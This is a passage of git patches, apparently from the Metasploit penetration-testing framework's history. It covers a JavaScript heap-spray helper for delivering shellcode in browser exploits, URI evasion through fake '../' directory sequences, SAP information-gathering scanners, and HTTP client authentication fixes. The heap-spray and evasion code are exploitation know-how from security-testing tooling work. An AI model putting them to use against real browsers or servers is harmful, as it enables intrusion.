(opts['uri_dir_fake_relative']) - buf = "" - uri_str.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri_str = buf - end - - url = uri_str - - if (opts['uri_full_url']) - url = opts['ssl'] ? "https" : "http" - url << opts['vhost'] - url << (opts['port'] == 80) ? "" : ":#{opts['port']}" - url << uri_str - end - - url - end - def set_encode_uri(str) a = str.dup opts['uri_encode_count'].times { diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 26729dfa52..426721cb6c 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -2,15 +2,6 @@ require 'spec_helper' require 'rex/proto/http/client_request' -shared_context "with 'uri_dir_self_reference'" do - before(:all) do - client_request.opts['uri_dir_self_reference'] = true - end - - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/./" - end -end shared_context "with no evasions" do before(:all) do @@ -24,6 +15,30 @@ shared_context "with no evasions" do end end + +shared_context "with 'uri_dir_self_reference'" do + before(:all) do + client_request.opts['uri_dir_self_reference'] = true + end + + it "should have a self reference" do + client_request.send(:set_uri).should == "/./" + end +end + + +shared_context "with 'uri_dir_fake_relative'" do + before(:all) do + client_request.opts['uri_dir_fake_relative'] = true + end + + it "should contain sequences of '../'" do + client_request.send(:set_uri).should include("../") + end + +end + + shared_context "with 'uri_full_url'" do before(:all) do @@ -42,9 +57,6 @@ shared_context "with 'uri_full_url'" do context "with ipv6 host" do let(:host) { '2001:DB8::1' } - #before(:each) do - # client_request.opts['vhost'] = "[#{host}]" - #end it_behaves_like "uri_full_url" end @@ -59,7 +71,7 @@ end shared_examples "uri_full_url" do - it "should have the host in the URI" do + it "#set_uri should have the host in the URI" do client_request.send(:set_uri).should start_with("http://#{host}/") end @@ -86,7 +98,6 @@ describe Rex::Proto::Http::ClientRequest do 'vhost' => 'www.example.com', }), { - :set_cgi => { :result => "/" }, :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, :set_version => { :result => "HTTP/1.1\r\n" }, @@ -238,6 +249,7 @@ describe Rex::Proto::Http::ClientRequest do describe "#set_uri" do it_behaves_like "with 'uri_full_url'" it_behaves_like "with 'uri_dir_self_reference'" + it_behaves_like "with 'uri_dir_fake_relative'" it_behaves_like "with no evasions" end From 9f35452d736a723d6fdcf398c0f9993fa2f91ff8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 10:35:40 -0600 Subject: [PATCH 111/139] Beef up the default values for precise alloc size and consistency --- lib/msf/core/exploit/http/server.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6b5c143a9f..cdde2972f5 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -829,8 +829,8 @@ protected if (shellcode == undefined) { throw "Missing argument: shellcode"; } if (objId == undefined) { throw "Missing argument: objId"; } if (offset == undefined) { offset = 0x104; } - if (heapBlockSize == undefined) { heapBlockSize = 0x40000; } - if (maxAllocs == undefined) { maxAllocs = 0x250; } + if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } + if (maxAllocs == undefined) { maxAllocs = 0x350; } if (browser == undefined) { browser = 'generic'; } if (offset > 0x800) { throw "Bad alignment"; } From 86d78939ad7450488800b0313283c8cbd4101f68 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:01:15 -0600 Subject: [PATCH 112/139] Make objId optional --- lib/msf/core/exploit/http/server.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index cdde2972f5..f341663e9a 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -799,9 +799,9 @@ protected # # The "sprayHeap" JavaScript function supports the following arguments: # shellcode => The shellcode to spray in JavaScript. - # objId => The ID for a
HTML tag. # browser => The type of browser to target for precise block size, such as: # 'ie8', 'ie9', 'ie10', and 'generic'. + # objId => Optional. The ID for a
HTML tag. # offset => Optional. Number of bytes to align the shellcode, default: 0x104 # heapBlockSize => Optional. Allocation size, default: 0x40000 # maxAllocs => Optional. Number of allocation calls, default: 0x250 @@ -817,7 +817,9 @@ protected # # def js_property_spray - js = %Q|function sprayHeap( oArg ) { + js = %Q| + var div_container; + function sprayHeap( oArg ) { shellcode = oArg.shellcode; browser = oArg.browser; @@ -827,7 +829,6 @@ protected objId = oArg.objId; if (shellcode == undefined) { throw "Missing argument: shellcode"; } - if (objId == undefined) { throw "Missing argument: objId"; } if (offset == undefined) { offset = 0x104; } if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } if (maxAllocs == undefined) { maxAllocs = 0x350; } @@ -835,7 +836,12 @@ protected if (offset > 0x800) { throw "Bad alignment"; } - var div_container = document.getElementById(objId); + div_container = document.getElementById(objId); + + if (div_container == null) { + div_container = document.createElement("div"); + } + div_container.style.cssText = "display:none"; var data; junk = unescape("%u2020%u2020"); From 2c013cada8959a79ad27f3096e7178502f300b5a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:05:18 -0600 Subject: [PATCH 113/139] Update documentation for default values --- lib/msf/core/exploit/http/server.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index f341663e9a..444173c731 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -803,8 +803,8 @@ protected # 'ie8', 'ie9', 'ie10', and 'generic'. # objId => Optional. The ID for a
HTML tag. # offset => Optional. Number of bytes to align the shellcode, default: 0x104 - # heapBlockSize => Optional. Allocation size, default: 0x40000 - # maxAllocs => Optional. Number of allocation calls, default: 0x250 + # heapBlockSize => Optional. Allocation size, default: 0x80000 + # maxAllocs => Optional. Number of allocation calls, default: 0x350 # # Example of using the 'sprayHeap' function: #
From 722e07702920dc55d8759b635e6c9608707c7687 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:09:52 -0600 Subject: [PATCH 114/139] Update generic target --- lib/msf/core/exploit/http/server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 444173c731..b69acde1f3 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -873,7 +873,7 @@ protected break; case 'generic': - obj.title = data.substring(0, heapBlockSize-0x58); + obj.title = data.substring(0, (heapBlockSize-2)/2); div_container.appendChild(obj); break; From 8cb5da0794415ec3a59578405f4296135bf94c57 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:21:23 -0600 Subject: [PATCH 115/139] One size rules them all. --- lib/msf/core/exploit/http/server.rb | 31 ++--------------------------- 1 file changed, 2 insertions(+), 29 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index b69acde1f3..bd0e6f0942 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -799,8 +799,6 @@ protected # # The "sprayHeap" JavaScript function supports the following arguments: # shellcode => The shellcode to spray in JavaScript. - # browser => The type of browser to target for precise block size, such as: - # 'ie8', 'ie9', 'ie10', and 'generic'. # objId => Optional. The ID for a
HTML tag. # offset => Optional. Number of bytes to align the shellcode, default: 0x104 # heapBlockSize => Optional. Allocation size, default: 0x80000 @@ -822,7 +820,6 @@ protected function sprayHeap( oArg ) { shellcode = oArg.shellcode; - browser = oArg.browser; offset = oArg.offset; heapBlockSize = oArg.heapBlockSize; maxAllocs = oArg.maxAllocs; @@ -832,7 +829,6 @@ protected if (offset == undefined) { offset = 0x104; } if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } if (maxAllocs == undefined) { maxAllocs = 0x350; } - if (browser == undefined) { browser = 'generic'; } if (offset > 0x800) { throw "Bad alignment"; } @@ -855,31 +851,8 @@ protected for (var i = 0; i < maxAllocs; i++) { var obj = document.createElement("button"); - switch (browser) - { - case 'ie8': - obj.title = data.substring(0, (heapBlockSize-6)/2); - div_container.appendChild(obj); - break; - - case 'ie9': - obj.title = data.substring(0, (heapBlockSize-2)/2); - div_container.appendChild(obj); - break; - - case 'ie10': - obj.title = data.substring(0, (heapBlockSize-2)/2); - div_container.appendChild(obj); - break; - - case 'generic': - obj.title = data.substring(0, (heapBlockSize-2)/2); - div_container.appendChild(obj); - break; - - default: - throw "Invalid argument"; - } + obj.title = data.substring(0, (heapBlockSize-2)/2); + div_container.appendChild(obj); } } | From 18c0bb0ac8a6d7469e1b3a918fb78a59e7a980b9 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:34:48 -0600 Subject: [PATCH 116/139] Updates description again --- lib/msf/core/exploit/http/server.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index bd0e6f0942..8cb75c490a 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -805,13 +805,11 @@ protected # maxAllocs => Optional. Number of allocation calls, default: 0x350 # # Example of using the 'sprayHeap' function: - #
# # def js_property_spray From 0dcfb51071a2d63f9eb9aada22e30310ce632abf Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 28 Feb 2013 18:46:18 +0100 Subject: [PATCH 117/139] cleanup for sap_soap_rfc_system_info --- .../scanner/sap/sap_soap_rfc_system_info.rb | 28 +++++++++---------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 1ec8aee729..21100734ee 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -64,13 +64,13 @@ class Metasploit4 < Msf::Auxiliary def report_note_sap(type, data, value) # create note report_note( - :host => rhost, - :port => rport, - :proto => 'tcp', - :sname => 'sap', - :type => type, - :data => data + value - ) if data + :host => rhost, + :port => rport, + :proto => 'tcp', + :sname => 'sap', + :type => type, + :data => data + value + ) if data # update saptbl for output @saptbl << [ data, value ] end @@ -122,14 +122,12 @@ class Metasploit4 < Msf::Auxiliary # create table for output @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] SOAP RFC_SYSTEM_INFO", - 'Prefix' => "\n", - 'Postfix' => "\n", - 'Indent' => 1, - 'Columns' =>[ - "Key", - "Value" - ]) + 'Header' => "[SAP] SOAP RFC_SYSTEM_INFO", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' =>[ "Key", "Value" ] + ) response = res.body From 8f58c7b25e1b3aec8b8e21cb14eb39c4c16aee8c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 28 Feb 2013 18:47:48 +0100 Subject: [PATCH 118/139] cleanup for sap_icf_public_info --- ..._system_info.rb => sap_icf_public_info.rb} | 52 +++++++++---------- 1 file changed, 24 insertions(+), 28 deletions(-) rename modules/auxiliary/scanner/sap/{sap_icf_rfc_system_info.rb => sap_icf_public_info.rb} (82%) diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb similarity index 82% rename from modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb rename to modules/auxiliary/scanner/sap/sap_icf_public_info.rb index ad808d5c43..2095bef790 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb @@ -26,26 +26,24 @@ class Metasploit4 < Msf::Auxiliary def initialize super( - 'Name' => 'SAP /sap/public/info RFC_SYSTEM_INFO Function Sensitive Information Gathering', + 'Name' => 'SAP ICF /sap/public/info Service Sensitive Information Gathering', 'Description' => %q{ - This module uses the RFC_SYSTEM_INFO function within SAP Internet Communication + This module uses the /sap/public/info service within SAP Internet Communication Framework (ICF) to obtain the operating system version, SAP version, IP address - and other information through /sap/public/info - + and other information. }, 'Author' => [ - # original sap_soap_rfc_system_info module - 'Agnivesh Sathasivam', - 'nmonkee', - # repurposed for /sap/public/info (non-RFC) - 'ChrisJohnRiley' + 'Agnivesh Sathasivam', # original sap_soap_rfc_system_info module + 'nmonkee', # original sap_soap_rfc_system_info module + 'ChrisJohnRiley' # repurposed for /sap/public/info (non-RFC) ], 'License' => MSF_LICENSE ) register_options( [ - OptString.new('PATH', [true, 'Path to SAP Application Server', '/']) + Opt::RPORT(8000), + OptString.new('TARGETURI', [true, 'Path to SAP Application Server', '/']) ], self.class) end @@ -59,23 +57,23 @@ class Metasploit4 < Msf::Auxiliary def report_note_sap(type, data, value) # create note report_note( - :host => rhost, - :port => rport, - :proto => 'tcp', - :sname => 'sap', - :type => type, - :data => data + value - ) if data + :host => rhost, + :port => rport, + :proto => 'tcp', + :sname => 'sap', + :type => type, + :data => data + value + ) if data # update saptbl for output @saptbl << [ data, value ] end def run_host(ip) - print_status("[SAP] #{ip}:#{rport} - Sending RFC_SYSTEM_INFO request to SAP Application Server") - uri = normalize_uri(datastore['PATH'] + '/sap/public/info') + print_status("[SAP] #{ip}:#{rport} - Sending request to SAP Application Server") + uri = normalize_uri(target_uri.path, '/sap/public/info') begin - res = send_request_raw({ 'uri' => uri }, 20) + res = send_request_cgi({ 'uri' => uri }) if res and res.code != 200 print_error("[SAP] #{ip}:#{rport} - Server did not respond as expected") return @@ -93,14 +91,12 @@ class Metasploit4 < Msf::Auxiliary # create table for output @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", - 'Prefix' => "\n", - 'Postfix' => "\n", - 'Indent' => 1, - 'Columns' =>[ - "Key", - "Value" - ]) + 'Header' => "[SAP] ICF SAP PUBLIC INFO", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' => [ "Key", "Value" ] + ) response = res.body From 5a79fcd11e516c17abaa4ef9a7fce956b31d7518 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Feb 2013 13:47:30 -0600 Subject: [PATCH 119/139] Ensure we build only one Authorization header Also fixes an issue where Host headers were generated with nil by preferring the vhost from Client instead of the default nil from ClientRequest. --- lib/rex/proto/http/client.rb | 58 +++++++------------ lib/rex/proto/http/client_request.rb | 18 +++++- .../lib/rex/proto/http/client_request_spec.rb | 4 +- spec/lib/rex/proto/http/client_spec.rb | 49 ++++++++++++++++ 4 files changed, 89 insertions(+), 40 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index be7b6cb436..38b5c3ac2b 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -38,11 +38,13 @@ class Client self.username = username self.password = password - self.config = { + # Take ClientRequest's defaults, but override with our own + self.config = Http::ClientRequest::DefaultConfig.merge({ 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, - }.merge(Http::ClientRequest::DefaultConfig) + }) + # XXX: This info should all be controlled by ClientRequest self.config_types = { 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], 'uri_encode_count' => 'integer', @@ -104,7 +106,6 @@ class Client self.config[var]=val end - end # @@ -145,12 +146,6 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' - opts['client_config'] = self.config - - if opts['basic_auth'] and not opts['authorization'] - opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) - end - req = ClientRequest.new(opts) end @@ -167,28 +162,26 @@ class Client # # @return [ClientRequest] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} + opts['agent'] ||= config['agent'] + opts['basic_auth'] ||= config['basic_auth'] || '' + opts['cookie'] ||= config['cookie'] + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['data'] ||= '' + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] ||= config['raw_headers'] || '' + opts['uri'] ||= '/' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + opts['version'] ||= config['version'] || '1.1' + opts['vhost'] ||= config['vhost'] opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - - opts['client_config'] = self.config if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true @@ -196,10 +189,6 @@ class Client opts['encode_params'] = false end - if opts['basic_auth'] and not opts['authorization'] - opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) - end - req = ClientRequest.new(opts) end @@ -321,11 +310,8 @@ class Client return res if opts['username'].nil? or opts['username'] == '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' - if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) - else - opts['headers'] = { 'Authorization' => basic_auth_header(opts['username'],opts['password'] )} - end + opts['headers'] ||= {} + opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) req = request_cgi(opts) res = _send_recv(req,t,persist) return res diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 62e1ede0e8..039d11559d 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -86,6 +86,12 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) + + # Backwards compatibility for wonky basic authentication api from + # the dawn of time. + if opts['basic_auth'] and not opts['authorization'] + @opts['authorization'] = "Basic #{Rex::Text.encode_base64(opts['basic_auth'])}" + end end def to_s @@ -162,12 +168,18 @@ class ClientRequest req << set_version req << set_host_header - # If an explicit User-Agent header is set, then use that instead of the value of user_agent + # If an explicit User-Agent header is set, then use that instead of + # the default unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end - req << set_auth_header + # Similar to user-agent, only add an automatic auth header if a + # manual one hasn't been provided + unless opts['headers'].keys.map{|x| x.downcase }.include?('authorization') + req << set_auth_header + end + req << set_cookie_header req << set_connection_header req << set_extra_headers @@ -388,7 +400,7 @@ class ClientRequest # def set_host_header return "" if opts['uri_full_url'] - host ||= opts['vhost'] + host = opts['vhost'] # IPv6 addresses must be placed in brackets if Rex::Socket.is_ipv6?(host) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 426721cb6c..3bf44fcaa4 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -22,7 +22,8 @@ shared_context "with 'uri_dir_self_reference'" do end it "should have a self reference" do - client_request.send(:set_uri).should == "/./" + client_request.send(:set_uri).should include("/./") + client_request.to_s.should include("/./") end end @@ -34,6 +35,7 @@ shared_context "with 'uri_dir_fake_relative'" do it "should contain sequences of '../'" do client_request.send(:set_uri).should include("../") + client_request.to_s.should include("../") end end diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 11177b90fe..bb2f642e38 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -55,6 +55,55 @@ describe Rex::Proto::Http::Client do it "should produce a CGI HTTP request" do req = cli.request_cgi req.should be_a_kind_of Rex::Proto::Http::ClientRequest + end + + context "with authorization" do + subject(:cli) do + cli = Rex::Proto::Http::Client.new(ip) + cli.set_config({"authorization" => "Basic base64dstuffhere"}) + cli + end + let(:user) { "user" } + let(:pass) { "pass" } + let(:base64) { ["user:pass"].pack('m').chomp } + + context "and an Authorization header" do + before do + cli.set_config({"headers" => { "Authorization" => "Basic #{base64}" } }) + end + it "should have one Authorization header" do + req = cli.request_cgi + match = req.to_s.match("Authorization: Basic") + match.should be + match.length.should == 1 + end + it "should prefer the value in the header" do + req = cli.request_cgi + match = req.to_s.match(/Authorization: Basic (.*)$/) + match.should be + match.captures.length.should == 1 + match.captures[0].chomp.should == base64 + end + end + + context "and basic_auth" do + before do + cli.set_config({"basic_auth" => "user:pass"}) + end + it "should not have two Authorization headers" do + req = cli.request_cgi + match = req.to_s.match("Authorization: Basic") + match.should be + match.length.should == 1 + end + it "should prefer basic_auth" do + req = cli.request_cgi + match = req.to_s.match(/Authorization: Basic (.*)$/) + match.should be + match.captures.length.should == 1 + match.captures[0].chomp.should == base64 + end + end end From 239e1934b8bc8d84b6daa1cbcef29b98aba41575 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 1 Mar 2013 09:03:45 -0600 Subject: [PATCH 120/139] Use migrations from metasploit_data_models [#44034071] metasploit_data_models version 0.5.0 copied the migrations from metasploit-framework/data/sql/migrate to metasploit_data_models/db/migrate so that specs could be written the Mdm models in metasploit_data_models. As part of the specs, :null => false columns that should be :null => true were discovered, so a new migration was added, but to metasploit_data_models/db/migrate, so it could be tested. Instead of replicating migrations back and forth, I'm removing the migrations completely from metasploit-framework and changing the default migration path in Msf::DbManager#migration_paths to MetasploitDataModels.root.join('db', 'migrate'). --- Gemfile | 2 +- Gemfile.lock | 14 +- data/sql/migrate/000_create_tables.rb | 79 --------- data/sql/migrate/001_add_wmap_tables.rb | 35 ---- data/sql/migrate/002_add_workspaces.rb | 36 ---- data/sql/migrate/003_move_notes.rb | 20 --- data/sql/migrate/004_add_events_table.rb | 16 -- data/sql/migrate/005_expand_info.rb | 58 ------- data/sql/migrate/006_add_timestamps.rb | 26 --- data/sql/migrate/007_add_loots.rb | 20 --- data/sql/migrate/008_create_users.rb | 16 -- data/sql/migrate/009_add_loots_ctype.rb | 10 -- data/sql/migrate/010_add_alert_fields.rb | 16 -- data/sql/migrate/011_add_reports.rb | 19 --- data/sql/migrate/012_add_tasks.rb | 24 --- data/sql/migrate/013_add_tasks_result.rb | 10 -- data/sql/migrate/014_add_loots_fields.rb | 12 -- data/sql/migrate/015_rename_user.rb | 16 -- data/sql/migrate/016_add_host_purpose.rb | 10 -- data/sql/migrate/017_expand_info2.rb | 58 ------- .../migrate/018_add_workspace_user_info.rb | 29 ---- data/sql/migrate/019_add_workspace_desc.rb | 23 --- data/sql/migrate/020_add_user_preferences.rb | 11 -- .../migrate/021_standardize_info_and_data.rb | 18 -- data/sql/migrate/022_enlarge_event_info.rb | 10 -- .../migrate/023_add_report_downloaded_at.rb | 10 -- .../024_convert_service_info_to_text.rb | 12 -- data/sql/migrate/025_add_user_admin.rb | 19 --- data/sql/migrate/026_add_creds_table.rb | 19 --- .../20100819123300_migrate_cred_data.rb | 154 ------------------ .../20100824151500_add_exploited_table.rb | 16 -- .../20100908001428_add_owner_to_workspaces.rb | 9 - .../20100911122000_add_report_templates.rb | 18 -- .../20100916151530_require_admin_flag.rb | 15 -- ...00916175000_add_campaigns_and_templates.rb | 61 ------- .../20100920012100_add_generate_exe_column.rb | 8 - .../20100926214000_add_template_prefs.rb | 11 -- .../migrate/20101001000000_add_web_tables.rb | 57 ------- data/sql/migrate/20101002000000_add_query.rb | 10 -- .../migrate/20101007000000_add_vuln_info.rb | 15 -- ...20101008111800_add_clients_to_campaigns.rb | 10 -- ...20101009023300_add_campaign_attachments.rb | 15 -- .../20101104135100_add_imported_creds.rb | 17 -- .../migrate/20101203000000_fix_web_tables.rb | 34 ---- .../20101203000001_expand_host_comment.rb | 12 -- ...2033_add_limit_to_network_to_workspaces.rb | 9 - ...20110112154300_add_module_uuid_to_tasks.rb | 9 - .../migrate/20110204112800_add_host_tags.rb | 28 ---- .../20110317144932_add_session_table.rb | 110 ------------- ...414180600_add_local_id_to_session_table.rb | 11 -- .../20110415175705_add_routes_table.rb | 18 -- .../migrate/20110422000000_convert_binary.rb | 72 -------- ...0110425095900_add_last_seen_to_sessions.rb | 8 - ...0110513143900_track_successful_exploits.rb | 31 ---- ...517160800_rename_and_prune_nessus_vulns.rb | 26 --- ...0527000000_add_task_id_to_reports_table.rb | 11 -- .../20110527000001_add_api_keys_table.rb | 12 -- .../20110606000001_add_macros_table.rb | 16 -- ...00_move_old_imported_creds_to_new_files.rb | 127 --------------- ...10622000000_add_settings_to_tasks_table.rb | 12 -- .../20110624000001_add_listeners_table.rb | 19 --- ...0625000001_add_macro_to_listeners_table.rb | 12 -- ...110630000001_add_nexpose_consoles_table.rb | 21 --- ...0002_add_name_to_nexpose_consoles_table.rb | 12 -- .../20110717000001_add_profiles_table.rb | 15 -- ...20110727163801_expand_cred_ptype_column.rb | 9 - .../20110730000001_add_initial_indexes.rb | 85 ---------- .../migrate/20110812000001_prune_indexes.rb | 23 --- .../migrate/20110922000000_expand_notes.rb | 9 - .../20110928101300_add_mod_ref_table.rb | 17 -- ...10000_add_display_name_to_reports_table.rb | 24 --- .../migrate/20111203000000_inet_columns.rb | 13 -- .../20111204000000_more_inet_columns.rb | 17 -- .../20111210000000_add_scope_to_hosts.rb | 9 - ...0120126110000_add_virtual_host_to_hosts.rb | 9 - ...20120411173220_rename_workspace_members.rb | 9 - ...20601152442_add_counter_caches_to_hosts.rb | 21 --- .../20120625000000_add_vuln_details.rb | 34 ---- .../20120625000001_add_host_details.rb | 16 -- .../migrate/20120625000002_expand_details.rb | 16 -- .../migrate/20120625000003_expand_details2.rb | 24 --- .../20120625000004_add_vuln_attempts.rb | 19 --- ...000005_add_vuln_and_host_counter_caches.rb | 14 -- .../20120625000006_add_module_details.rb | 118 -------------- .../20120625000007_add_exploit_attempts.rb | 26 --- .../20120625000008_add_fail_message.rb | 12 -- ...2805_add_owner_and_payload_to_web_vulns.rb | 13 -- lib/msf/core/db_manager.rb | 6 +- 88 files changed, 13 insertions(+), 2219 deletions(-) delete mode 100755 data/sql/migrate/000_create_tables.rb delete mode 100755 data/sql/migrate/001_add_wmap_tables.rb delete mode 100755 data/sql/migrate/002_add_workspaces.rb delete mode 100755 data/sql/migrate/003_move_notes.rb delete mode 100755 data/sql/migrate/004_add_events_table.rb delete mode 100755 data/sql/migrate/005_expand_info.rb delete mode 100755 data/sql/migrate/006_add_timestamps.rb delete mode 100755 data/sql/migrate/007_add_loots.rb delete mode 100755 data/sql/migrate/008_create_users.rb delete mode 100755 data/sql/migrate/009_add_loots_ctype.rb delete mode 100755 data/sql/migrate/010_add_alert_fields.rb delete mode 100755 data/sql/migrate/011_add_reports.rb delete mode 100755 data/sql/migrate/012_add_tasks.rb delete mode 100755 data/sql/migrate/013_add_tasks_result.rb delete mode 100755 data/sql/migrate/014_add_loots_fields.rb delete mode 100755 data/sql/migrate/015_rename_user.rb delete mode 100755 data/sql/migrate/016_add_host_purpose.rb delete mode 100755 data/sql/migrate/017_expand_info2.rb delete mode 100755 data/sql/migrate/018_add_workspace_user_info.rb delete mode 100755 data/sql/migrate/019_add_workspace_desc.rb delete mode 100755 data/sql/migrate/020_add_user_preferences.rb delete mode 100755 data/sql/migrate/021_standardize_info_and_data.rb delete mode 100755 data/sql/migrate/022_enlarge_event_info.rb delete mode 100755 data/sql/migrate/023_add_report_downloaded_at.rb delete mode 100755 data/sql/migrate/024_convert_service_info_to_text.rb delete mode 100755 data/sql/migrate/025_add_user_admin.rb delete mode 100755 data/sql/migrate/026_add_creds_table.rb delete mode 100755 data/sql/migrate/20100819123300_migrate_cred_data.rb delete mode 100755 data/sql/migrate/20100824151500_add_exploited_table.rb delete mode 100755 data/sql/migrate/20100908001428_add_owner_to_workspaces.rb delete mode 100755 data/sql/migrate/20100911122000_add_report_templates.rb delete mode 100755 data/sql/migrate/20100916151530_require_admin_flag.rb delete mode 100755 data/sql/migrate/20100916175000_add_campaigns_and_templates.rb delete mode 100755 data/sql/migrate/20100920012100_add_generate_exe_column.rb delete mode 100755 data/sql/migrate/20100926214000_add_template_prefs.rb delete mode 100755 data/sql/migrate/20101001000000_add_web_tables.rb delete mode 100755 data/sql/migrate/20101002000000_add_query.rb delete mode 100755 data/sql/migrate/20101007000000_add_vuln_info.rb delete mode 100755 data/sql/migrate/20101008111800_add_clients_to_campaigns.rb delete mode 100755 data/sql/migrate/20101009023300_add_campaign_attachments.rb delete mode 100755 data/sql/migrate/20101104135100_add_imported_creds.rb delete mode 100755 data/sql/migrate/20101203000000_fix_web_tables.rb delete mode 100755 data/sql/migrate/20101203000001_expand_host_comment.rb delete mode 100755 data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb delete mode 100755 data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb delete mode 100755 data/sql/migrate/20110204112800_add_host_tags.rb delete mode 100755 data/sql/migrate/20110317144932_add_session_table.rb delete mode 100755 